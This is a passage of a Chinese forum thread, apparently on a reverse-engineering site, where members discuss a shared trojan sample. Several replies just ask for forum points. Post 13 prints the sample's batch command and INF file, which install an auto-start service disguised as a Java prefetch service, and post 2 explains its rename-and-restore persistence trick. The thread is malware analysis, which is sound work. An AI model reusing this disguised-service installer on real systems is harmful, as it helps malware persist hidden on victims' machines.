能力值:
( LV2,RANK:10 )
|
-
-
2 楼
服务启动EXE,EXE启动RUNDLL32启动DLL后,EXE改名,DLL监视关机消息,发现关机,将EXE改回来。
这种马只要把RUNDLL32关了,就废了,重起也没用了,呵呵
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
100kx,见者有份,呵呵。
|
能力值:
( LV2,RANK:10 )
|
-
-
4 楼
占座,接分~
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
见者有分啊,楼主给我点分吧,争取买个邀请码
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
100kx,见者有份,哈哈..
|
能力值:
( LV12,RANK:230 )
|
-
-
7 楼
时间戳是9月5号的,感谢楼主提供样本。
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
问题是,他是如何实现开机自动上线的呢?
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
而且360还不会提示
|
能力值:
( LV2,RANK:10 )
|
-
-
10 楼
应该是采用HOOK驱动模式
|
能力值:
( LV2,RANK:10 )
|
-
-
11 楼
启动方式就是服务呀!怎么都没看我的分析?
|
能力值:
( LV3,RANK:30 )
|
-
-
12 楼
很感兴趣  不过更感兴趣kx币~~
|
能力值:
( LV2,RANK:10 )
|
-
-
13 楼
apple.bat
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\windows\system32\systeminf.inf
systeminf.inf
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=JavaQuickjnhga2,,My_AddService_Name
[My_AddService_Name]
DisplayName=Prefetches JRE files for qfaster startujknb
Description=Prefetches JRE files for faster startup of Java applets and applications.c
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\windows\system32\mjilgj.td //随机
|
能力值:
( LV2,RANK:10 )
|
-
-
14 楼
新人初到,看的第一贴
|
能力值:
( LV2,RANK:10 )
|
-
-
15 楼
登陆的第一帖。。。。 
|
|
|
|
